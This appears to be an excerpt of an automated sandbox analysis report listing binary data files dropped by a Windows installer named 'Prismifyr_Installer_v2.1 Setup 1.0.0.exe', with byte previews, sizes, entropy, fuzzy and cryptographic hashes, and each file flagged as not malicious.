                                                                                                                                                                                                                        Preview:.........'..e.6...h.>...i.O...j.[...k.j...l.u...n.}...o.....p.....q.....r.....s.....t.....v.....w.H...y.o...z.....|.....}.............#.....+.....3.....;.....B.....I.....P.....Q.....R.....T.....d.....v.................!.................(.................'.....:.................Y.....o...........8.....h.....z...........0.....].....h.................J.....].................G.....e...........C.....~.................b.......................j.......................v.................;.......................t.......................b.......................B.......................: ..... ..... ..... ....F!.....!.....!....."....P"....."....."....."....G#.....#.....#.....#....G$.....$.....$.....$....`%.....%.....&....*&....}&.....&.....&.....'....n'.....'.....'.....(....h(.....(.....(.....)....j).....).....*....,*....x*.....*.....*.....*....]+.....+.....+.....+....k,.....,.....-.....-.....-..........j.....~....../...../...../...../....^0.....0.....1.....1....`1.....1.....1.....1....B2.....2.....2
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):856753
                                                                                                                                                                                                                        Entropy (8bit):5.046695313452183
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:u5oHS8u313uyqoT+seqyRmX1loTUOmdAQifaQ2XxFMJGk62YhhdTiI5MX4qOoUmi:K755X
                                                                                                                                                                                                                        MD5:AD1032B084779FD1CB1A6AE6B51E07E2
                                                                                                                                                                                                                        SHA1:983D0FD8E810EB2F11764850FB01DA6049129790
                                                                                                                                                                                                                        SHA-256:4E8EC6BC2EE7BDB7E44BD9368BFF98EDBBAE7C19838BFA59AB9F8C443ED7317E
                                                                                                                                                                                                                        SHA-512:ECB1C656FC4AA3608A8392D79ADDBE28EC097A7A6085134D3D254E9754DEDA15E00788BFBAC143C9AD29DFC0CA38A5308A2CE908264C6AB5C96C3E488D1944EA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........t'..e.n...h.v...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.N...w.z...y.....z.....|.....}.'.....P.....U.....].....e.....m.....t.....{........................................................... .....J.......................,.................3.....\.................1.....X...................................0.....z...........@.................I...................................S.................U ..... ....C!....a!....."....."....@#....b#....3$.....%.....%.....%....&&.....&.....&.....'.....'.....(....G(....X(.....(....x).....).....)....h*.....+....X+....m+.....+.....,.....,.....,....u-..........;.....N...........j/...../...../....W0.....0....91....J1.....1.....2.....2.... 3.....3....%4....U4....x4.....5.....5.....6....=6.....6....f7.....7.....7.....8....49.....9.....9....K:.....:.....:.....;.....;....c<.....<.....<....}=.....>....[>....|>....z?....r@.....A....9A.....A.....B.....B....0C.....C.....D.....D.....E.....E.....F....2F....SF.....F.....G.....G.....H
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):534639
                                                                                                                                                                                                                        Entropy (8bit):5.42632231647943
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:C5Hs07v19loPajaQ5lkgUtWnep0WaAvqYM:6R5lTn1l
                                                                                                                                                                                                                        MD5:5D693A7021EB7C4AEF053BD0954B9FDB
                                                                                                                                                                                                                        SHA1:8500954DC82F8212FCB6E58DB128E650479BBBE9
                                                                                                                                                                                                                        SHA-256:C2B0402222E9E877618F908518D9BC62BCA45EA4167734CE93F36382CB30F2CD
                                                                                                                                                                                                                        SHA-512:425F5889FE6B1B3A38EFACE19419642CBA5D03657A33A9A85EB457AC2882075F1E73F58D036EF459F3001E8F717B92DF08D761D865711C3B2B560727841A9827
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........i'..e.X...h.`...i.q...j.}...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.>...w.j...y.....z.....|.....}.......@.....E.....M.....U.....].....d.....k.....r.....s.....t.....y.............................N...........!.....2.................+.....>.................U.....k...........?.....r.................4.....a.....o.................%.....5.......................!.................F.....`.................>.....T.................C.....X.................F.....d...........N.......................Y.....|.................,.....O.....].................).....5.............................d.......................I ..... ..... ..... ....%!....|!.....!.....!....."....["....."....."....."....n#.....#.....#.....$....`$....|$.....$.....$....@%....b%....{%.....%....>&....b&....q&.....&....='....t'.....'.....'....&(....=(....L(.....(.....)....-)....?).....).....)....4*....N*.....*....Q+.....+.....+....",.....,.....,.....,....2-.....-.....-.....-..........O.....h.....x...........,/....W/
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):604396
                                                                                                                                                                                                                        Entropy (8bit):5.203517990920059
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:lFcF+oO8SCeUEmsynDQ1Jx0phwA6umx5vMq7proEuAlmdK:loO8uTx5N7V
                                                                                                                                                                                                                        MD5:FCBA5A4988B87771B4C784FE13209B44
                                                                                                                                                                                                                        SHA1:2781CD227FD305F6A448156C99D742C622A945DE
                                                                                                                                                                                                                        SHA-256:75BD5B252C6629F9EB30C00006C9270E341D12CB94679D334CBFF7D35A28D37A
                                                                                                                                                                                                                        SHA-512:BF483C68A6CC236FE5F45AB7982DF951F13BE571838FEF13A5DA3A201C98E26DBBAAA3CCB18950D6BC823797590F2FD3CABA65B63B6CC9FE11C3123532323286
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........F(..e.....h.....i.0...j.<...k.K...l.V...n.^...o.c...p.p...q.v...r.....s.....t.....v.....w.)...y.P...z.~...|.....}.....................................#.....*.....1.....2.....3.....8.....E.....Z.....p.........../........... .....:...........1.....v...........3........... .....G...........<.......................`.......................s.................J.................*...........@................./.......................~...........*.....D...........?.................8 ..... ....$!....F!.....!....."....0"....M"....."....."....##....0#.....#.....#.....$.....$.....$.....$....5%....K%.....%.....&....M&....\&.....&.....'....Q'...._'.....'.... (....Q(...._(.....(....")....T)....b).....)....c*.....*.....*....4+.....+.....+.....+.....,.....,.....,.....,.....-....}-.....-.....-....G............/....7/...../...../....(0....B0.....0.... 1....S1....n1.....1....b2.....2.....2....k3.....4....n4.....4.....5.....5.....5.....6.....6.....6....,7....D7.....7.....7....$8....:8.....8....09....l9
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):623622
                                                                                                                                                                                                                        Entropy (8bit):5.38695478943288
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:MuGwUHel7ZL1H43p9ZR6QuaMVqRZz14xlZsZCMYnY8R58g9sQzc7IPV8IxwSSWt5:f0YViO5+W
                                                                                                                                                                                                                        MD5:F6EF5ECEB1CDE0903CD4D1D18CA908EC
                                                                                                                                                                                                                        SHA1:5ECCBB618BD0640C7E49011729BBD87B535A2B47
                                                                                                                                                                                                                        SHA-256:8155305ECE1B061D7B459B1B662AF74F91AA04C0C028486253E208EA0AAC0187
                                                                                                                                                                                                                        SHA-512:03A311A7668373E74C5FCB48105F103DB67DB67AC4999B666A2D141FBCAD2C4EBF3BB18B31EE072A3C0C61E9F063ECA9F6DBB212FDCC0C20181DA203A786D72F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.#...o.(...p.5...q.;...r.G...s.v...t.....v.....w.....y.....z.C...|.j...}.....................................................................................*.....9.............................{...........0.....H...........f.................N.................1.......................!.................0.....E...........:.....}...........,.......................h.................,.................A.....T...........?...................................:.................0 ....G ..... ..... ....#!....5!.....!.....!....5"....G".....".....#....M#....e#.....#.....$....b$....w$.....$....)%....U%....c%.....%.....&....B&....Q&.....&.....'....G'....['.....'....^(.....(.....(....=).....).....).....)..../*.....*.....*.....*.....+.....+.....+.....+....y,.....,....4-....o-.....-..........4.....J...........6/....r/...../.....0....z0.....0.....0....i1.....1....:2....M2.....2....?3.....3.....3....74.....4.....5.....5....w5.....5.....5.....6.....6.....6....=7
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1220384
                                                                                                                                                                                                                        Entropy (8bit):4.321325137592257
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:1oXxpIkT/T2imKPo5zfpJDf1IwjAwREJKVMjNiT7llj63rFulPCaSi5NAWsWi//h:1OIiTHm6o5NJL7b6/5qwhr1lXR
                                                                                                                                                                                                                        MD5:B54152F1794AAC7D270F5CFBB7A020D5
                                                                                                                                                                                                                        SHA1:D14F3FEB7206468BE4ABEC39FCD14CB4D3FBF561
                                                                                                                                                                                                                        SHA-256:B23B8F24E6A0A5267F4704F82DBBE5BD4BA34A3878A883BDBD9680F6512A2201
                                                                                                                                                                                                                        SHA-512:8EC8FEFDAC754B6049B045985B754A4308DED71D79F43925A302076610FA8A69F29FE764AC5ACF65618D684FE73097862F4B9B43C8D21F410CE7E94ADF78120A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.$...j.0...k.?...l.J...n.R...o.W...p.d...q.j...r.v...s.....t.....v.....w.....y.D...z.r...|.....}.................................................%.....&.....'.....,.....N.....s.................5.....8...........X.....K.....................................................M.......................3.....~...........^...........H.....h.....K...... ....f ..... .....!....."....B#.....#....Z$.....%.....%.....%.....&.....'.....'....#(.... ).....*.....*.....*.....,.....-.....-.....-.......... /....\/...../....<0.....0....11....Y1.....2.....2.....2.....3.....3.....4.....4.....5.....5.....6.....6.....7.....7....i8.....8.....8....}9..../:.....:.....:....V;.....<....a<.....<.....=.....>....H?....~?....7@.....@....>A....gA.....A....lB.....B.....B....mC....ND.....D.....E.....F.....F....`G.....G.....H....%I....hI.....I....}J....CK.....K.....K.....L.....M.....N....RN....yO.....P....tQ.....Q.....R.....S....(T....|T....hU....4V.....V.....V.....W...._X.....X.....X.....Z.....Z.....[
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):752099
                                                                                                                                                                                                                        Entropy (8bit):4.617015698574379
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:9XqylNaQGmhVzyD4ki2T2rnCkW9Wqu/5l2PX8ACeX+7eQCajp5Q6syU+ZHWO53N7:FqyNa7s5Y+j
                                                                                                                                                                                                                        MD5:A68FA2B08E442B05874DCA64B65470DA
                                                                                                                                                                                                                        SHA1:D79593CF29572A491B4F56680EC9F1BCCE7F312F
                                                                                                                                                                                                                        SHA-256:DDFC635CF22DD117B28929B196A46554D21656C60A7EB4CE35DDE84A80032DC0
                                                                                                                                                                                                                        SHA-512:B80328E2B4043DECD45FC95C6AC4192E550ED21398563C7A8135BE50ECECA01A0F762CCCBABD37265F14C25A0F4D63B6CB7AB98996533CD743FBBFF4D195DF6C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.)...s.X...t.o...v.....w.....y.....z.%...|.L...}.}...................................................................................%.....B.................:.....\...........Z.................q...........d...............................................A.....R...........5.....d...............................................V.....z.........................................O.....f...........k.................. ....-!.....!.....!....D".....".....".....#.....#.....#.....$....2$.....$....N%.....%.....%....8&.....&.....&.....&.....'.....'....4(....I(.....(..../)....j)....{).....)....c*.....*.....*....0+.....+.....+.....+.....,.....-....f-.....-..........m.................7/...../...../...../....p0.....0....)1....H1.....1....[2.....2.....2....P3.....3.....3.....3....d4.....4.....4.....5.....5....#6....v6.....6....n7....!8.....8.....8....j9.....9....1:....b:.....;.....;.....;.....<.....<.....<....!=....E=.....=.....>.....>
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1286715
                                                                                                                                                                                                                        Entropy (8bit):4.298180848533515
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:udTXlt9ui9DMN74LYHK7l4V/BB0ZV1dKu4lYvhOEOTByntDPtDlgpfgrs4fe/8K/:udblvui94ycHK7lV25RKbhcn
                                                                                                                                                                                                                        MD5:36497D8F7461012BAFC3B5E4DFF4CD77
                                                                                                                                                                                                                        SHA1:2CC68792E47AD159CD419825F6F024076F0DD5E9
                                                                                                                                                                                                                        SHA-256:5D2BB8B65E89CB7107934D77C1CC9731F83A0C5F041C1A6643E3215146296A3C
                                                                                                                                                                                                                        SHA-512:CC7291F1BDA4564D9A53F3AB8A98D1D493B3888736062008C0C17A88054E167E4040A027464585E6F5B3D3801E7A1ECFD3585C8ED5AE38E498216B8CA519D5A8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.5...v.j...w.....y.....z.....|.....}.C.....l.....q.....y.......................................................................M.................`.................~...........C.....q...................................'.....V.....)...........7.....g.......................=.....$ ..... ....'!....d!....."....m#.....#....%$.....$.....%..../&....X&....?'.....'....m(.....(.....).....*....%+....W+.....,.....-....T...........h/.....0....n0.....0....R1.....2....V2.....2.....3.....3.....3.....4.....4.....5.....6....46.....6.....7.....8....$8.....8.....9.....9.....9.....:....C;.....;.....;....k<....#=....}=.....=.....>.....?....-@....]@.....A.....A.....B....=B.....B....YC.....C.....C....qD.....E.....E.....E.....F....bG.....G....<H.....H.....I.....I.....I.....J.....K....\L.....L.....M....BN.....N.....O....yP.....Q.....R.....R.....S.....T....,U....nU.....V.....W.....X....uX....iY....'Z.....Z.....Z.....[.....\....%]
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):581407
                                                                                                                                                                                                                        Entropy (8bit):5.514977484792997
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:ikTWSkiC1OaHU0khw8ZhTE765e9YjPCjlK:ikj1zhw8PE25uYrUK
                                                                                                                                                                                                                        MD5:6249233AFF4A7A2CAB1A01681F3B555D
                                                                                                                                                                                                                        SHA1:62892F7CC147063BCFD097DF52512C4CAA39247A
                                                                                                                                                                                                                        SHA-256:A6CC5DA8B3B46F2A327DE8F39C18A8A9B58031E1A0484321E2CEBE397C30F29B
                                                                                                                                                                                                                        SHA-512:23AE48EA57FCF4A43AC558131DDF6C001104E44840AE44F1324EE7AF3F434D6279ED2C7E50FBEDD04F419B3F15AE973F6D8ECB0C602FAA449E64A62249D6203D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.2...h.:...i.K...j.W...k.f...l.q...n.y...o.~...p.....q.....r.....s.....t.....v.....w.D...y.k...z.....|.....}...................'...../.....7.....>.....E.....L.....M.....N.....P.....\.....h.....v...........#.................1.................5.....J...........A.........................................0.......................$.....t.................#.......................]...........(.....J.................Z.....r...........6.....m.................i.................c...........P.....s...........!.....H.....d.................. ..... ....t ..... ..... ..... ....R!.....!.....!....."....V"....."....."....."....U#.....#.....#.....$....V$.....$.....$.....$....:%.....%.....%.....%....J&.....&.....'....%'....x'.....'.....'.....(....b(.....(.....(.....(....@).....).....).....)....T*.....*.....*....-+.....+.....+.....+.....,.....,.....,.....-....+-.....-..........^.....{....../...../...../...../....p0.....0.....1....;1.....1.....1....-2....>2.....2.....2.....2.....3....x3.....3....%4
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):626229
                                                                                                                                                                                                                        Entropy (8bit):5.640149449198026
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:2w6RVhkmyedlnRj9/Hd2DfAUAxekitpd5qK8FZ9plLcYNtDdK0djew6cTnjDi54W:23V7ndlnaAcd5qK8ZhD0qbm5HPyK
                                                                                                                                                                                                                        MD5:2F761B20258C04CC9E3335451160B33A
                                                                                                                                                                                                                        SHA1:2144A0CF0E994F3B7B030FC8C51584B4C1AF11D0
                                                                                                                                                                                                                        SHA-256:AF4B5654CCF418E5BD34E2850C63E4E73C85EB06DA1CBE75207743ECB70135B8
                                                                                                                                                                                                                        SHA-512:B605C0DC34CB070AFCE84B4D189BE63F976F60626F73F0258B52D169DBEA59E338A54BB75F801F6C95203DCC179FDB284D3A836CF1420A6F77EFA165E1BBB4CB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.!...s.P...t.g...v.....w.....y.....z.....|.D...}.u.........................................................................................&.........................................X.....k...........o.................k.................3.................4.....E.................T.....u...........u.............................d.................n.................-...................................B.....\.............................h ..... .....!....9!.....!....."....8"....P"....."....(#....S#....k#.....#.....$.....$.....$....a%.....%....7&....M&.....&....X'.....'.....'.....(.....(.....(.....(....f).....)....:*....N*.....*....c+.....+.....+..../,.....,.....,.....,....V-.....-.....-..........l............/....)/...../....%0....u0.....0.....1....a1.....1.....1.....2....`2.....2.....2....43.....3.....3.....4.....4....85.....5.....5....^6.....6.....7....b7.....7....q8.....8.....8....D9.....9.....9.....9....}:.....:....3;
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):517344
                                                                                                                                                                                                                        Entropy (8bit):5.382007575252981
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:KNU4nGe83eEhx38PmO8jBYBkf+eVnjHFHTmiZI/u5C7pjOBsIn0iT8wHp:BGGdeEhx3C82BcVnjHFzm8IG5C7pWp
                                                                                                                                                                                                                        MD5:C83B246A36389F1087D32E801091559C
                                                                                                                                                                                                                        SHA1:8A7D1D417868611CA3706A0D829C3B8F9774FCFC
                                                                                                                                                                                                                        SHA-256:F2761928E6A189AD28183304A5D56FB1C51F03CCA5F315112B7B8722B781546F
                                                                                                                                                                                                                        SHA-512:BA39A82FC9A379F0F83F107876DFEE73B4BF2F0E35B7C683002015DC3740C52402D0A5D3EB19CBA383C17B07ABEE807C47A7C27E278C0DB6847612097EF9161E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.&...l.1...n.9...o.>...p.K...q.Q...r.]...s.....t.....v.....w.....y.+...z.Y...|.....}...............................................................................+.....;.....M...........3.....{.................4.....a.....m...........4.....w.................N.......................I.....y.......................;.....R.................@.....d.................N.....e.................2.....?.......................!.................".....5.................U.....i.............................e.......................+.....v.......................W.......................<.....k.....u............ ....@ ....J ..... ..... .....!....&!.....!.....!....."....."....o".....".....".....#....W#.....#.....#.....#.....$....R$....q$.....$.....$....0%....[%....n%.....%.....&....E&....g&.....&.....&.....'.....'....u'.....'.....'.....(....t(.....(.....(.....).....).....*....d*....s*.....*....=+....w+.....+.....+....D,....r,.....,.....,.....-....*-....:-.....-.....-....0.
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):568007
                                                                                                                                                                                                                        Entropy (8bit):5.293666221850935
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:jHeZxQ1ClwrdX/MTx991jY9NxvESIqRRxsO1ytKvWjRT9Tj+ia3bDxLUAqpzSw9D:j+7QPdXd0lZTG8/Pskfgm4s5pLI1W
                                                                                                                                                                                                                        MD5:87724B77887DFFE15EBCA858A97852D5
                                                                                                                                                                                                                        SHA1:7519756ACA8D6EDCDBB0426323525229235645AD
                                                                                                                                                                                                                        SHA-256:8CB6406985AF29E71DDA10EBFCDB05428AB668F381C64DC4FEC1647473B7B9FD
                                                                                                                                                                                                                        SHA-512:EA441B7B8C6352BA2A2CB46F6D13BD60756029FA25858B81B8F252E2D45F4813F15E6D6D6DFB4B13D10990E4128EF64168B2F2694EF9DB95FF55DF17E2AA582B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.$...l./...n.7...o.<...p.I...q.O...r.[...s.....t.....v.....w.....y.)...z.W...|.~...}.........................................................................!.....0.....I.....Z.............................r................. .............................(.......................U.......................$.....m.................'.......................m...........<.....a...........0.....v.................G.......................n.................U.................:.......................2........................ ....N ..... ..... ..... ....1!.....!.....!.....!....9".....".....".....".....#....g#.....#.....#.....#....;$....i$....r$.....$.....%....H%....S%.....%....:&.....&.....&.....&....D'....m'.....'.....'.....'.....(....+(.....(.....(.....).....).....).....)....=*....z*.....*.....+....A+....V+.....+.....+.....,..../,.....,.....-....g-.....-................./....#/...../.....0....i0.....0.....1.....1.....1.....1..../2....o2.....2.....2.....3....q3.....3
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):692156
                                                                                                                                                                                                                        Entropy (8bit):5.702484156944294
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:tO5HmTzjDuFR6pe1huLKOw7Ei/lwLhO3tcACd5XYSRL51aZEhyQ2ImkNuHvPkw6z:YFR6pedkgKoixaZLQ2ftXabt5z2vVVs
                                                                                                                                                                                                                        MD5:F84E728B97F1766E1CD24800A409A411
                                                                                                                                                                                                                        SHA1:C42BD9849B5E5510E56DACF06A8CE126BFD00744
                                                                                                                                                                                                                        SHA-256:4BEEABF6962E1E5B042DEDBC45D21D3786C331A3AB1F3F3F51F75FE9ED8811EE
                                                                                                                                                                                                                        SHA-512:769CD214F19D735A06DC7EEF8DB23F6B3302E0DAECCFBCD6405C9AA251CA24392FE6CDFAD9AB9273C8C38AB763A502F2204B48526E10CF2C3439AB6544698F9C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........&h.e.p...h.x...i.....j.....k.....l.....m.....o.....p.....q."...v.....w.Z...y.....z.....|.....}.......0.....5.....=.....H.....P....._.....d.....l.....s.....z.....................................................$.....v...................................z...........].....x.....>...........Z.................u.........................................R.............................*.....q.................r.................".......................@.............................>.................%.......................E ..... .....!.....!.....!..../"....v"....."....>#.....#....*$....N$.....$....S%.....%.....%....-&.....&.....&.....&....t'.....'....&(....5(.....(....@).....).....)....B*.....*....2+....Q+.....+....K,.....,.....,....$-.....-.....-.....-....d............/....=/...../....I0.....0.....0....41.....1.....1.....1....L2.....2.....2.....3.....3.....3....)4....?4.....4.....5.....5.....6.....6.....7....i7.....7....%8.....8.....8.....9.....9.....9....,:....H:.....:....V;.....;.....;
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1392950
                                                                                                                                                                                                                        Entropy (8bit):4.237663846787979
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:APR7MrXUZiMUXzb4VMQOEoTQ6m0hY7Q593W24hjSEjR:AzicA51WR
                                                                                                                                                                                                                        MD5:2DE2428422D74AB06A3A10C60DEE0B15
                                                                                                                                                                                                                        SHA1:D08878C33CA0C32E38E7500AE6340640BAB2C9A9
                                                                                                                                                                                                                        SHA-256:733825261A7892DBA1A16A668517D9F2F6C48C17C7DE3B01CB4A3830E9179838
                                                                                                                                                                                                                        SHA-512:FBEA4AC2A41E224327058E363FD10E247A26D4507BF58D0DA5C7F20072272F853B25A0F26DA8BE1B38ED4684CF90E7FCCA094D393D9BDB14A4E19F53152626A2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'x.e.P...h.X...i.i...j.u...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.6...w.b...y.....z.....|.....}.......8.....=.....E.....M.....U.....\.....c.....j.....k.....l.....q.......................k.............................R.....Z...........i.........................................n...........j...........a............ ....K!.....!.....!.....#.....#.....$.....$....C&....R'....+(.....(.....)....d*.....*....3+....B,.....-.....-.....-....:/....P0....'1....b1.....2.....4.....4....Q5.....5.....6.....6.....7.....7....Q8.....8.....8....f9.....9....O:....d:....G;.....<.....<.....<.....=....P>.....>.....>.....?....S@.....@.....@.....A.....B.....B.....C.....C.....D.....E....QE....sF....rG....2H....aH....DI.....I....bJ.....J....OK.....K.....L....=L.....M.....M....?N....qN.....O....aP.....P....vQ....^R.....S....cS.....S.....T.....U....8V.....V.....W.....X....eY.....Y....9[.....\.....].....]....I_....G`.....a....}a.....b.....c....@d.....d....Ze.....f....mf.....f.....g.....h....ni
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):586014
                                                                                                                                                                                                                        Entropy (8bit):6.069092952804209
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:PEw78zHbv7ANf/FTS0mIXRxMSAG0GlzRXhw8fIt8OQ4E3hstRbrCqYwH75Rag7j8:L8iA5vK2oUa
                                                                                                                                                                                                                        MD5:FA3C8F5C1F1EE523C3F9D566DDB2BE24
                                                                                                                                                                                                                        SHA1:171133DFE6C2200157B9F21E1BAB690632F2BA64
                                                                                                                                                                                                                        SHA-256:A02DDB9E195A9AFF301F2E23C7ABC41BAF526E5F14CD4DBF15C55C5C5C78A09D
                                                                                                                                                                                                                        SHA-512:5482A964CCD9AD951338CD09CD8F2F76ACFE8516A73D2BEA6390C9FAC17D532A2ED47FD50642B6D9D7B1313CB688C3A997068CD71B9B985E423C0054FBCB4DAA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........&..e. ...h.(...i.9...j.D...k.p...l.x...m.....o.....p.....q.....r.....s.....t.....y.;...z.i...|.....}.................................................%.....,...........3.....?.....O.....b.....r...........e.................<.......................o...........#.....7.................I.....].................P.....`.................S.....f...........1.....V.....q...........O.......................S.......................E.....q.....~...........P.................%.......................d.......................D.............................m.........................................G.......................R ..... ..... ..... ....Y!.....!.....!.....!....V"....."....."....."....t#.....#..../$....C$.....$.....$.....%....,%.....%.....%.....&....2&.....&.....&.....'....0'.....'....#(....`(.....(.....(.....)....2)....?).....).....)....)*....<*.....*.....*....&+....A+.....+....?,.....,.....,.....-....l-.....-.....-....%.....|................../....q/...../...../.....0....f0.....0.....0....&1
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):630430
                                                                                                                                                                                                                        Entropy (8bit):5.629401487038347
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:9pa3GQES6MAMF2glccVOc354745CMjMK6SuM:q3GpMxmE3595JjMA
                                                                                                                                                                                                                        MD5:EA646CE51BD07999529FB719DDF063D5
                                                                                                                                                                                                                        SHA1:94FEE802CC876E5D2B722D1872C7ED927A14C33F
                                                                                                                                                                                                                        SHA-256:AF5EA09E52A33451C43DBCEE0028FF0A19BCE6877C00F2643B8FA1F9D060EF90
                                                                                                                                                                                                                        SHA-512:58D0BEB8D91825785DD4C0AD08070A04554CBAD39B443CB9CC8B2747A8257A5295FEBFC4484DD3E7A3EDE86859BCEBBCB176A112016FD07C64BE1D856BD39678
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.-...j.9...k.H...l.S...n.[...o.`...p.m...q.s...r.....s.....t.....v.....w.&...y.M...z.{...|.....}..................................... .....'.........../.....0.....2.....@.....M.....a.....r.......................*...........@.................:.............................%.....].....w...........p...................................................../.....T...........g.................?.......................t...........(.....8...........P.................A............ ....= ..... .....!....F!....a!.....!....D"....t"....."....."....r#.....#.....#....2$.....$.....$.....%....w%.....%....1&....@&.....&....>'....y'.....'.....(.....(.....(.....(....@).....).....).....).....*..../+.....+.....+.....,.....,.....,.....,....a-.....-..........F...........8/....n/...../.....0.....0.....0.....1....v1.....1.....2.....2.....2....;3....}3.....3.....4.....4.....4.....5.....5....^6.....6.....6....Q7.....7.....8....38.....8....e9.....9.....9.....:....|:.....:.....:....5;.....;.....<
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):629152
